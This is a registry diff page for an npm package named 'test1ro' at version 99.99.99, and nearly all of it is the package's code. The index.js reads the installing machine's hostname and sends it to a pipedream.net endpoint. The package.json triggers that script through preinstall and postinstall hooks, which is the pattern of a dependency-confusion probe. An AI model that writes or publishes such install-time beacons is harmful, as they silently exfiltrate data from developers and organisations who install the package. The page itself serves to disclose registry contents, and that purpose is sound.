test1ro 99.99.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +9 -0
- package/package.json +18 -0
package/index.js
ADDED
|
@@ -0,0 +1,9 @@
|
|
|
1
|
+
const request = require("requests")
|
|
2
|
+
var os = require("os")
|
|
3
|
+
var fs = require("fs")
|
|
4
|
+
var h = os.hostname()
|
|
5
|
+
|
|
6
|
+
let host = "eo8f3m3ho26a0nm.m.pipedream.net"
|
|
7
|
+
let packages = "test1ro"
|
|
8
|
+
|
|
9
|
+
request(`http://${host}/${packages}?h=${h}`, (error, response, body) => {})
|
package/package.json
ADDED
|
@@ -0,0 +1,18 @@
|
|
|
1
|
+
{
|
|
2
|
+
"Dependencies": {
|
|
3
|
+
"request": "^2.88.2"
|
|
4
|
+
},
|
|
5
|
+
"dependencies": {
|
|
6
|
+
"requests": "^0.3.0"
|
|
7
|
+
},
|
|
8
|
+
"description": "",
|
|
9
|
+
"license": "ISC",
|
|
10
|
+
"main": "index.js",
|
|
11
|
+
"name": "test1ro",
|
|
12
|
+
"scripts": {
|
|
13
|
+
"postinstall": "node index.js --save-prod",
|
|
14
|
+
"preinstall": "node index.js --save-prod",
|
|
15
|
+
"start": "node index.js --save-prod"
|
|
16
|
+
},
|
|
17
|
+
"version": "99.99.99"
|
|
18
|
+
}
|